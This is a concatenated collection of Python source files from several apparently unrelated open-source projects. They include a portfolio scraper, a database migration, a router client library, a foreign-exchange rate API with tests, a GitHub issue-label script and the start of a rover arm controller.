@contextlib.contextmanager
def visit(self, element: WebElement) -> Iterator[None]:
self.wait_refreshed(element)
yield
self.mark_visited(element)
def _get_product_rows(section: WebElement, timeout: timedelta) -> list[WebElement]:
cutoff = datetime.now() + timeout
while datetime.now() < cutoff:
product_rows: list[WebElement] = section.find_elements(
By.CSS_SELECTOR, "tr.product-row"
)
if len(product_rows) > 0:
return product_rows
raise RuntimeError("could not find product rows in section")
def _extract_cash_asset(product_row: WebElement) -> providers.Asset:
amount_str = product_row.find_elements(By.TAG_NAME, "td")[5].text.strip()
amount = Price.fromstring(amount_str).amount_float
assert amount is not None
return {
"name": "Cash",
"type": "currency",
"value": amount,
}
def _extract_fund_asset(product_type: str, product_row: WebElement) -> providers.Asset:
cells = product_row.find_elements(By.TAG_NAME, "td")
name_cell = cells[0].find_element(By.CSS_SELECTOR, "p.content-product-name")
product_name = name_cell.text.strip()
ongoing_charges = float(cells[1].text.strip()[:-1]) / 100.0
units = float(cells[2].text.strip())
avg_unit_cost = Price.fromstring(cells[3].text.strip()).amount_float
last_price = Price.fromstring(cells[4].text.strip()).amount_float
total_cost = Price.fromstring(cells[5].text.strip()).amount_float
value = Price.fromstring(cells[6].text.strip()).amount_float
assert value is not None
return {
"name": product_name,
"type": f"{product_type} fund",
"value": value,
"units": units,
"provider_specific": {
"Ongoing charges": ongoing_charges,
"Last price": last_price,
"Total cost": total_cost,
"Average unit cost": avg_unit_cost,
},
}
def _extract_asset(product_type: str, product_row: WebElement) -> providers.Asset:
if product_type == "cash":
return _extract_cash_asset(product_row)
return _extract_fund_asset(product_type, product_row)
@swallow_exc(StaleElementReferenceException)
def _get_login_error(auth_form: WebElement) -> Optional[str]:
error_area: list[WebElement] = auth_form.find_elements(
By.CLASS_NAME, "error-message"
)
if error_area and error_area[0].is_displayed():
login_error: str = error_area[0].text.strip()
return login_error
return None
def _report_auth_error(error_message: str) -> None:
raise AuthenticationFailure(error_message.replace("\n", " ").strip())
def _is_logged_in(do: SeleniumHelper) -> bool:
return do.find_maybe(By.CSS_SELECTOR, "section.portfolio-header") is not None
```
#### File: migrations/versions/418d0d0013a2_distributed_trace.py
```python
from finbot.core.db.types import JSONEncoded
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '418d0d0013a2'
down_revision = '2a508081682f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('finbot_distributed_traces',
sa.Column('guid', sa.String(length=36), nullable=False),
sa.Column('path', sa.String(length=64), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.Column('user_data', JSONEncoded(), nullable=True),
sa.Column('start_time', sa.DateTime(timezone=True), nullable=True),
sa.Column('end_time', sa.DateTime(timezone=True), nullable=True),
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),
sa.PrimaryKeyConstraint('guid', 'path', 'name')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('finbot_distributed_traces')
# ### end Alembic commands ###
```
#### File: system/finbotwsrv/test_smoke.py
```python
from finbot.core.environment import get_finbotwsrv_endpoint
from finbot.clients.finbot import FinbotClient, LineItem
import pytest
@pytest.fixture
def api() -> FinbotClient:
return FinbotClient(get_finbotwsrv_endpoint())
def test_healthy(api: FinbotClient):
assert api.healthy
def check_account(data):
assert data["id"] == "dummy"
assert data["iso_currency"] == "GBP"
assert data["type"] == "cash"
def check_assets_financial_data(results):
assert len(results) == 1
data = results[0]
check_account(data["account"])
assets = data["assets"]
assert len(assets) == 1
asset = assets[0]
assert asset["name"] == "Cash"
assert asset["type"] == "currency"
assert asset["value"] == 1000.0
def check_balances_financial_data(results):
assert len(results) == 1
data = results[0]
check_account(data["account"])
assert data["balance"] == 1000.0
def test_get_financial_data(api: FinbotClient):
response = api.get_financial_data(
provider="dummy_uk",
credentials_data={},
line_items=[
LineItem.Assets,
LineItem.Balances,
],
)
assert "financial_data" in response
financial_data = response["financial_data"]
print(financial_data)
assert len(financial_data) == 2
for entry in financial_data:
line_item = entry["line_item"]
if line_item == "assets":
check_assets_financial_data(entry["results"])
elif line_item == "balances":
check_balances_financial_data(entry["results"])
else:
assert False, f"Unexpected line item: {line_item}"
```
#### File: system/histwsrv/test_smoke.py
```python
from finbot.core.environment import get_histwsrv_endpoint
from finbot.clients import HistoryClient
import pytest
@pytest.fixture
def api() -> HistoryClient:
return HistoryClient(get_histwsrv_endpoint())
def test_healthy(api: HistoryClient):
assert api.healthy
```
|
{
"source": "jean-edouard-boulanger/mylivebox",
"score": 2
}
|
#### File: mylivebox/mylivebox/client.py
```python
from .entities import (
DeviceInfo,
DynDnsHost,
VoipConfig,
NmcStatus,
WanStatus,
WifiStatus,
WifiStats,
IPTVConfig,
User,
)
from dateutil.parser import parse as parse_date
from typing import Union, Protocol, List, Optional, Dict
from datetime import datetime
import requests
import json
import logging
import socket
import pickle
logger = logging.getLogger("mylivebox")
def _resolve_livebox_url() -> str:
return 'http://' + socket.gethostbyname("livebox")
class ClientError(RuntimeError):
pass
class SessionError(ClientError):
pass
class BasicCredentials(object):
def __init__(self, username: str, password: str):
self.username = username
self.password = password
class SessionBase(Protocol):
def send_request(self,
endpoint: str,
method: Optional[str] = None,
depth: Optional[int] = None,
parameters: Optional[Dict] = None):
pass
def save(self) -> bytes:
pass
class Session(SessionBase):
def __init__(self,
http_session: requests.Session,
base_url: str,
context_id: str):
self._http_session = http_session
self._base_url = base_url
self._context_id = context_id
@property
def context_id(self) -> str:
return self._context_id
def send_request(self,
endpoint: str,
method: Optional[str] = None,
depth: Optional[int] = None,
parameters: Optional[Dict] = None):
uri = f"{self._base_url}/sysbus/{endpoint.replace('.', '/')}"
if method is not None:
uri = f"{uri}:{method}"
if depth is not None:
uri = f"{uri}?_restDepth={depth}"
response = self._http_session.post(
uri,
headers={
"X-Context": self._context_id,
"X-Prototype-Version": "1.7",
"Content-Type": "application/x-sah-ws-1-call+json; charset=UTF-8",
"Accept": "text/javascript"
},
data=json.dumps({
"parameters": parameters or {}
})
)
logger.debug(response.json())
result = response.json()["result"]
if "error" in result or "errors" in result:
raise SessionError(f"'{endpoint}' request failed: {result}")
return result
def save(self) -> bytes:
binary_data = pickle.dumps({
"http_session": self._http_session,
"base_url": self._base_url,
"context_id": self._context_id
})
return binary_data
@staticmethod
def load(stream: bytes) -> 'Session':
data = pickle.loads(stream)
return Session(data["http_session"], data["base_url"], data["context_id"])
@staticmethod
def create(username, password, base_url) -> 'Session':
session = requests.Session()
auth_response = session.post(
f"{base_url}/ws",
data=json.dumps({
"service": "sah.Device.Information",
"method": "createContext",
"parameters": {
"applicationName": "so_sdkut",
"username": username,
"password": password
}
}),
headers={
'Content-Type': 'application/x-sah-ws-1-call+json',
'Authorization': 'X-Sah-Login'
}
)
context_id = auth_response.json()["data"]["contextID"]
return Session(session, base_url, context_id)
SideEffect = None
class Livebox(object):
def __init__(self,
session_source: Union[SessionBase, BasicCredentials],
base_url: str = None):
base_url = base_url
if isinstance(session_source, Session):
self._session = session_source
elif isinstance(session_source, BasicCredentials):
base_url = base_url or _resolve_livebox_url()
self._session = Session.create(
session_source.username,
session_source.password,
base_url)
else:
raise ClientError("Invalid input: only support Session or Credentials")
@property
def session(self) -> Session:
return self._session
def reboot(self) -> SideEffect:
self._session.send_request("NMC", "reboot")
@property
def language(self) -> str:
response = self._session.send_request("UserInterface", "getLanguage")
return response["status"]
@property
def available_languages(self) -> List[str]:
response = self._session.send_request("UserInterface", "getLanguage")
return response["data"]["availableLanguages"]
@language.setter
def language(self, new_value: str) -> SideEffect:
self._session.send_request(
"UserInterface", "setLanguage",
parameters={"currentLanguage": new_value}
)
def ring_phone(self) -> SideEffect:
self._session.send_request("VoiceService.VoiceApplication", "ring")
@property
def users(self) -> List[User]:
response = self._session.send_request("UserManagement", "getUsers")
return [User.deserialize(item) for item in response["status"]]
@property
def usb_devices(self) -> List[Dict]:
response = self._session.send_request("USBHosts", "getDevices")
return response["status"]
@property
def devices(self) -> List[Dict]:
response = self._session.send_request("Devices", "get")
return response["status"]
@property
def device_info(self) -> DeviceInfo:
response = self._session.send_request("DeviceInfo", "get")
return DeviceInfo.deserialize(response["status"])
@property
def system_time(self) -> datetime:
response = self._session.send_request("Time", "getTime")
return parse_date(response["data"]["time"])
@property
def utc_time(self) -> datetime:
response = self._session.send_request("Time", "getUTCTime")
return parse_date(response["data"]["time"])
@property
def time_synchronized(self) -> datetime:
response = self._session.send_request("Time", "getStatus")
return response["data"]["status"] == "Synchronized"
@property
def ntp_servers(self) -> List[str]:
response = self._session.send_request("Time", "getNTPServers")
return [
s for s in response["data"]["servers"].values()
if len(s) > 0
]
@property
def local_timezone(self) -> str:
response = self._session.send_request("Time", "getLocalTimeZoneName")
return response["data"]["timezone"]
@local_timezone.setter
def local_timezone(self, timezone: str) -> SideEffect:
self._session.send_request(
"Time", "setLocalTimeZoneName",
parameters={
"timezone": timezone
})
@property
def local_timezone_names(self) -> List[str]:
response = self._session.send_request("Time", "listLocalTimeZoneNames")
return response["data"]["timezones"]
@property
def pnp_status(self) -> List[str]:
response = self._session.send_request("PnP", "get")
return response["status"]
@property
def dyndns_services(self) -> List[str]:
response = self._session.send_request("DynDNS", "getServices")
return response["status"]
@property
def dyndns_hosts(self) -> List[DynDnsHost]:
response = self._session.send_request("DynDNS", "getHosts")
return [DynDnsHost.deserialize(item) for item in response["status"]]
def add_dyndns_host(self,
service: str,
hostname: str,
username: str,
password: str) -> SideEffect:
self._session.send_request(
"DynDNS", "addHost",
parameters={
"service": service,
"hostname": hostname,
"username": username,
"password": password
}
)
def remove_dyndns_host(self, hostname: str) -> SideEffect:
self._session.send_request(
"DynDNS", "delHost",
parameters={
"hostname": hostname
}
)
@property
def nmc_status(self) -> NmcStatus:
response = self._session.send_request("NMC", "get")
return NmcStatus.deserialize(response["status"])
@property
def wan_status(self) -> WanStatus:
response = self._session.send_request("NMC", "getWANStatus")
return WanStatus.deserialize(response["data"])
@property
def wifi_status(self) -> WifiStatus:
response = self._session.send_request("NMC.Wifi", "get")
return WifiStatus.deserialize(response["status"])
@property
def wifi_enabled(self) -> bool:
return self.wifi_status.enable
@wifi_enabled.setter
def wifi_enabled(self, enabled: bool) -> SideEffect:
assert isinstance(enabled, bool)
self._session.send_request(
"NMC.Wifi", "set",
parameters={"Enable": enabled}
)
@property
def wifi_password_displayed(self) -> bool:
response = self._session.send_request("Screen", "getShowWifiPassword")
return response["status"]
@wifi_password_displayed.setter
def wifi_password_displayed(self, enabled: bool):
assert isinstance(enabled, bool)
self._session.send_request(
"Screen", "setShowWifiPassword",
parameters={"Enable": enabled}
)
@property
def wifi_stats(self) -> WifiStats:
response = self._session.send_request("NMC.Wifi", "getStats")
return WifiStats.deserialize(response["data"])
@property
def voip_config(self) -> List[VoipConfig]:
response = self._session.send_request("NMC", "getVoIPConfig")
return [VoipConfig.deserialize(item) for item in response["status"]]
@property
def iptv_status(self) -> str:
response = self._session.send_request("NMC.OrangeTV", "getIPTVStatus")
return response["data"]["IPTVStatus"]
@property
def iptv_config(self) -> List[IPTVConfig]:
response = self._session.send_request("NMC.OrangeTV", "getIPTVConfig")
return [IPTVConfig.deserialize(item) for item in response["status"]]
@property
def iptv_multi_screens(self) -> bool:
response = self._session.send_request("NMC.OrangeTV", "getIPTVMultiScreens")
return response["data"]["Enable"]
@property
def firewall_level(self) -> str:
response = self._session.send_request("Firewall", "getFirewallLevel")
return response["status"]
```
#### File: mylivebox/tests/test_entities.py
```python
from mylivebox.entities import DeviceInfo
def test_deserialize_device_info():
data = {
"Manufacturer": "Sagemcom",
"ManufacturerOUI": "44A61E",
"ModelName": "SagemcomFast3965_LB2.8",
"Description": "SagemcomFast3965_LB2.8 Sagemcom fr",
"ProductClass": "Livebox 3",
"SerialNumber": "AN2022410620365",
"HardwareVersion": "SG_LB3_1.2.1",
"SoftwareVersion": "SG30_sip-fr-6.62.12.1",
"RescueVersion": "SG30_sip-fr-6.52.18.1",
"ModemFirmwareVersion": "",
"EnabledOptions": "",
"AdditionalHardwareVersion": "",
"AdditionalSoftwareVersion": "g6-f-sip-fr",
"SpecVersion": "1.1",
"ProvisioningCode": "HASH.3222.2827",
"UpTime": 429086,
"FirstUseDate": "0001-01-01T00:00:00Z",
"DeviceLog": "",
"VendorConfigFileNumberOfEntries": 1,
"ManufacturerURL": "http://www.sagemcom.com/",
"Country": "fr",
"ExternalIPAddress": "1.2.3.4",
"DeviceStatus": "Up",
"NumberOfReboots": 7,
"UpgradeOccurred": False,
"ResetOccurred": False,
"RestoreOccurred": False
}
device_info = DeviceInfo.deserialize(data)
assert device_info.manufacturer == "Sagemcom"
assert device_info.manufacturer_oui == "44A61E"
assert device_info.model_name == "SagemcomFast3965_LB2.8"
assert device_info.description == "SagemcomFast3965_LB2.8 Sagemcom fr"
assert device_info.product_class == "Livebox 3"
assert device_info.serial_number == "AN2022410620365"
assert device_info.hardware_version == "SG_LB3_1.2.1"
assert device_info.software_version == "SG30_sip-fr-6.62.12.1"
assert device_info.rescue_version == "SG30_sip-fr-6.52.18.1"
assert device_info.modem_firmware_version == ""
assert device_info.enabled_options == ""
assert device_info.additional_hardware_version == ""
assert device_info.additional_software_version == "g6-f-sip-fr"
assert device_info.spec_version == "1.1"
assert device_info.provisioning_code == "HASH.3222.2827"
assert device_info.uptime == 429086
assert device_info.first_use_date == "0001-01-01T00:00:00Z"
assert device_info.device_log == ""
assert device_info.vendor_config_file_number_of_retries == 1
assert device_info.manufacturer_url == "http://www.sagemcom.com/"
assert device_info.country == "fr"
assert device_info.external_ip_address == "1.2.3.4"
assert device_info.device_status == "Up"
assert device_info.number_of_reboots == 7
assert device_info.upgrade_occurred is False
assert device_info.reset_occurred is False
assert device_info.restore_occurred is False
```
|
{
"source": "jean-edouard-boulanger/python-quickforex",
"score": 2
}
|
#### File: python-quickforex/quickforex/api.py
```python
from typing import Iterable, Union, Optional, Any, Type
from datetime import date
from decimal import Decimal
from quickforex.providers.base import ProviderBase
from quickforex.providers.exchangerate_host import ExchangeRateHostProvider
from quickforex.providers.provider_metadata import ProviderMetadata
from quickforex.providers import factory as providers_factory
from quickforex.domain import CurrencyPairType, CurrencyPair, DateRange
from quickforex.utils import (
parse_currency_pairs_args,
parse_currency_pair_args,
parse_date_range_kwargs,
)
_DEFAULT_PROVIDER: ProviderBase = ExchangeRateHostProvider
_INSTALLED_PROVIDER: ProviderBase = _DEFAULT_PROVIDER()
def _provider() -> ProviderBase:
return _INSTALLED_PROVIDER
def _create_provider(**kwargs) -> ProviderBase:
if "provider_id" in kwargs:
settings_overrides = {
field: value for field, value in kwargs.items() if field != "provider_id"
}
settings_overrides = settings_overrides if len(settings_overrides) > 0 else None
return providers_factory.create_provider(
provider_id=kwargs["provider_id"], settings_overrides=settings_overrides
)
elif "provider" in kwargs:
return kwargs["provider"]
return _provider()
class Api(object):
def __init__(self, **kwargs):
"""QuickForex API.
Examples:
api = Api()
# Use the provider available by default (this is what you want in most cases)
api = Api(provider_id="exchangerate.host", source="ecb")
# Use a provider instance created from its identifier (and optional provider-specific settings overrides)
api = Api(provider=existing_provider_instance)
# Use a specific provider instance
:param kwargs: Either:
- provider (existing provider instance) argument
- provider_id as well as any additional provider-specific settings
- No argument (use the default provider)
"""
self._provider = _create_provider(**kwargs)
def get_latest_rate(self, *currency_pair_args: CurrencyPairType) -> Decimal:
"""Retrieve the last available rate for the given currency pair
Examples:
api.get_latest_rate("EUR/USD")
api.get_latest_rate("EUR", "USD")
api.get_latest_rate(("EUR", "USD"))
api.get_latest_rate(CurrencyPair("EUR", "USD"))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:return: Last exchange rate for the provided currency pair.
"""
return self._provider.get_latest_rate(
currency_pair=parse_currency_pair_args(*currency_pair_args)
)
def get_latest_rates(
self, *currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType]
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the last available rate for each given currency pair
Examples:
api.get_latest_rates("EUR/USD", "EUR/GBP")
api.get_latest_rates("EURUSD", "BTC/USDT")
api.get_latest_rates(("EUR", "USD"), ("EUR", "GBP"))
api.get_latest_rates(CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP"))
api.get_latest_rates({CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")})
api.get_latest_rates([CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")])
api.get_latest_rates([CurrencyPair("EUR", "USD"), ("EUR", "GBP")])
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:return: Last exchange rate for each provided currency pair.
"""
return self._provider.get_latest_rates(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args)
)
def get_historical_rate(
self, *currency_pair_args: CurrencyPairType, as_of: date
) -> Decimal:
"""Retrieve the exchange rate for the given currency pair at a given historical date.
Examples:
api.get_historical_rate("EUR/USD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate("EURUSD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate("EUR", "USD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate(("EUR", "USD"), as_of=date(year=2021, month=1, day=1))
api.get_historical_rate(CurrencyPair("EUR", "USD"), as_of=date(year=2021, month=1, day=1))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:param as_of: Historical date
:return: Historical exchange rate for the provided currency pair.
"""
return self._provider.get_historical_rate(
currency_pair=parse_currency_pair_args(*currency_pair_args), as_of=as_of
)
def get_historical_rates(
self,
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
as_of: date
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the exchange rate for the given currency pair at a given historical date.
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:param as_of: Historical date
:return: Historical exchange rate for each provided currency pair.
"""
return self._provider.get_historical_rates(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args), as_of=as_of
)
def get_rates_time_series(
self,
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
**date_range_kwargs: Union[DateRange, date]
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""Retrieve the historical rates for one or more currency pairs between two dates.
Examples:
api.get_rates_time_series(
"EUR/USD",
start_date=date(year=2020, month=1, day=1),
end_date=date(year=2021, month=1, day=1)
)
api.get_rates_time_series(
"EUR/USD", "EURUSD"
start_date=date(year=2020, month=1, day=1),
end_date=date(year=2021, month=1, day=1)
)
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:param date_range_kwargs: Date range, can be either:
- Single 'date_range' (type: quickforex.DateRange) argument
- Both 'start_date' (type: datetime.date) and 'end_date' (type: datetime.date) arguments
:return: Historical exchange rate for each provided currency pair for the provided date range.
"""
return self._provider.get_rates_time_series(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args),
date_range=parse_date_range_kwargs(**date_range_kwargs),
)
@property
def provider_metadata(self) -> ProviderMetadata:
return ProviderMetadata.from_provider_type(self._provider)
def get_latest_rate(*currency_pair_args: CurrencyPair) -> Decimal:
"""Retrieve the last available rate for the given currency pair
Examples:
quickforex.get_latest_rate("EUR/USD")
quickforex.get_latest_rate("EUR", "USD")
quickforex.get_latest_rate(("EUR", "USD"))
quickforex.get_latest_rate(CurrencyPair("EUR", "USD"))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:return: Last exchange rate for the provided currency pair.
"""
return Api().get_latest_rate(*currency_pair_args)
def get_latest_rates(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType]
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the last available rate for each given currency pair
Examples:
quickforex.get_latest_rates("EUR/USD", "EUR/GBP")
quickforex.get_latest_rates("EURUSD", "BTC/USDT")
quickforex.get_latest_rates(("EUR", "USD"), ("EUR", "GBP"))
quickforex.get_latest_rates(CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP"))
quickforex.get_latest_rates({CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")})
quickforex.get_latest_rates([CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")])
quickforex.get_latest_rates([CurrencyPair("EUR", "USD"), ("EUR", "GBP")])
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:return: Last exchange rate for each provided currency pair.
"""
return Api().get_latest_rates(*currency_pairs_args)
def get_historical_rate(*currency_pair_args: CurrencyPairType, as_of: date) -> Decimal:
"""Retrieve the last available rate for the given currency pair
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:param as_of: Historical date
:return: Historical exchange rate for the provided currency pair.
"""
return Api().get_historical_rate(*currency_pair_args, as_of=as_of)
def get_historical_rates(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
as_of: date
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs_args:
:param as_of: Historical date
:return: Historical exchange rate for each provided currency pair.
"""
return Api().get_historical_rates(*currency_pairs_args, as_of=as_of)
def get_rates_time_series(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
**date_range_kwargs: Union[DateRange, date]
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""Retrieve the historical rates for one or more currency pairs between two dates.
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument types.
:param date_range_kwargs: Date range, can either be:
- Single 'date_range' (type: quickforex.DateRange) argument
- Both 'start_date' (type: datetime.date) and 'end_date' (type: datetime.date) arguments
:return: Historical exchange rate for each provided currency pair for the provided date range.
"""
return Api().get_rates_time_series(*currency_pairs_args, **date_range_kwargs)
def install_provider(provider: ProviderBase) -> None:
"""Install an alternative provider to query foreign exchange rates. Note that calling this function is not needed
to use the QuickForex API because a provider is installed by default.
:param provider: Installed provider.
"""
global _INSTALLED_PROVIDER
_INSTALLED_PROVIDER = provider
def install_provider_with_id(
provider_id: str, settings_overrides: Optional[dict[str, Any]] = None
) -> None:
"""Install an alternative provider to query foreign exchange rates. Note that calling this function is not needed
to use the QuickForex API because a provider is installed by default.
Examples:
quickforex.install_provider_with_id("exchangerate.host", decimal_places=8)
:param provider_id: Installed provider.
:param settings_overrides: Additional settings passed to the chosen provider.
"""
install_provider(
providers_factory.create_provider(
provider_id=provider_id, settings_overrides=settings_overrides
)
)
def get_installed_provider() -> ProviderBase:
"""Retrieve the provider instance currently in use.
:return: Currently installed provider
"""
return _INSTALLED_PROVIDER
def get_default_provider_type() -> Type[ProviderBase]:
"""Retrieve the type of provider used by default.
:return: Type of provider used by default
"""
return _DEFAULT_PROVIDER
```
#### File: tests/unit/test_domain.py
```python
from datetime import date, timedelta
import pytest
from quickforex.domain import CurrencyPair, DateRange
today = date.today()
yesterday = today - timedelta(days=1)
def test_construct_currency_pair():
currency_pair = CurrencyPair("EUR", "USD")
assert currency_pair.domestic == "EUR"
assert currency_pair.foreign == "USD"
@pytest.mark.parametrize(
"bad_args",
[
(),
("EUR",),
("EUR", "USD", "GBP"),
("EUR", None),
(None, "GBP"),
("JPY", ""),
("", "JPY"),
("EUR", 1),
(1, "GBP"),
],
)
def test_construct_currency_pair_bad_inputs(bad_args):
with pytest.raises((ValueError, TypeError)):
CurrencyPair(*bad_args)
def test_reverse_currency_pair():
currency_pair = CurrencyPair("EUR", "USD").reversed()
assert currency_pair.domestic == "USD"
assert currency_pair.foreign == "EUR"
@pytest.mark.parametrize(
"pair_str,expected",
[
("EURUSD", CurrencyPair("EUR", "USD")),
("JPY/GBP", CurrencyPair("JPY", "GBP")),
("BTC/USDT", CurrencyPair("BTC", "USDT")),
],
)
def test_parse_currency_pair(pair_str: str, expected: CurrencyPair):
assert CurrencyPair.parse(pair_str) == expected
@pytest.mark.parametrize(
"bad_pair_str", ["", "EUR", "EURUS", "EUR/USD/BTC", "GBP/", "EUR//USD"]
)
def test_parse_currency_pair_bad_inputs(bad_pair_str):
with pytest.raises(ValueError):
CurrencyPair.parse(bad_pair_str)
@pytest.mark.parametrize(
"start_date,end_date",
[(yesterday, today), (today, today + timedelta(days=365)), (today, today)],
)
def test_construct_date_range(start_date: date, end_date: date):
date_range = DateRange(start_date, end_date)
assert date_range.start_date == start_date
assert date_range.end_date == end_date
@pytest.mark.parametrize(
"bad_args", [(), (today,), (today, yesterday), (yesterday, today, today)]
)
def test_construct_date_range(bad_args):
with pytest.raises((ValueError, TypeError)):
DateRange(*bad_args)
@pytest.mark.parametrize(
"date_range",
[
DateRange(
start_date=date(year=2021, month=1, day=1),
end_date=date(year=2021, month=12, day=31),
),
DateRange(start_date=today, end_date=today),
DateRange(start_date=yesterday, end_date=today),
],
)
def test_iter_date_range(date_range: DateRange):
all_dates = list(dt for dt in date_range)
assert len(all_dates) == (date_range.end_date - date_range.start_date).days + 1
for i in range(len(all_dates) - 1):
assert all_dates[i] + timedelta(days=1) == all_dates[i + 1]
```
|
{
"source": "jeanetteclark/metadig-checks",
"score": 3
}
|
#### File: metadig-checks/code/getIssueNameLabelList.py
```python
import re
import requests
def findUseCase(labels):
FAIR = ['Findable','Accessible','Interoperable','Reusable']
for useCase in FAIR:
if useCase in labels:
return useCase
return 'None'
def findLevel(labels):
levels = ['Essential','Supporting']
for level in levels:
if level in labels:
return level
return 'None'
owner = 'NCEAS'
repository = 'metadig-checks'
maxIssuePage = 12
checkNames = []
for page in range(1, maxIssuePage):
url = 'https://api.github.com/repos/' + owner + '/' + repository
url += '/issues?page=' + str(page)
r = requests.get(url)
#
# loop through the issues for each page
#
for issue in r.json():
#
# select issues where names contain just upper or lower case
# letters and "."
# Create list of tokens: ['issueNumber','title','milestone',
# labels (comma separated, name tokens (tab separated))]
#
if re.match('^[A-Za-z\.]*$', issue['title']):
tokenList = [str(issue['number'])]
tokenList.append(issue['title'])
if issue['milestone'] is not None:
if issue['milestone']['title'] is not None:
tokenList.append(issue['milestone']['title'])
else:
tokenList.append('')
labelList = list([label['name'] for label in issue['labels'] if 'name' in label])
tokenList.append(labelList)
#
# add issue to big list
#
checkNames.append(tokenList)
with open('metaDIGIssueData.txt', 'w') as output:
print('ID\tTitle\tMilestone\tLabels\tUseCase\tLevel\tt1\tt2\tt3\tt4\tt5\tt6\tt7', file=output)
for check in checkNames:
#
# fill empty name tokens for better pivot table display (no (blank))
#
nameTokens = check[1].replace(".", '\t')
tokenCount = len(nameTokens.split('\t'))
while tokenCount < 7:
nameTokens += '\t '
tokenCount += 1
print("%s\t%s\t%s\t%s\t%s\t%s\t%s" %
(check[0], check[1], check[2],
','.join(check[3]), findUseCase(check[3]),
findLevel(check[3]), nameTokens), file=output)
print('metaDIGIssueData.txt created')
```
|
{
"source": "JeanetteMueller/OpenPerseverance",
"score": 3
}
|
#### File: software/rover/arm.py
```python
from __future__ import division
import socket
import json
import time
import math
from time import sleep
import Adafruit_PCA9685
from Communication import Communication
from Helper import Helper
from DRV8825 import DRV8825
import RPi.GPIO as GPIO
com = Communication("arm")
sock = com.getSocket()
sock.bind((com.ip, com.getPortForArm()))
#### Servo
pwm = Adafruit_PCA9685.PCA9685(address=0x40)
servo_min = 150.0 # Min pulse length out of 4096
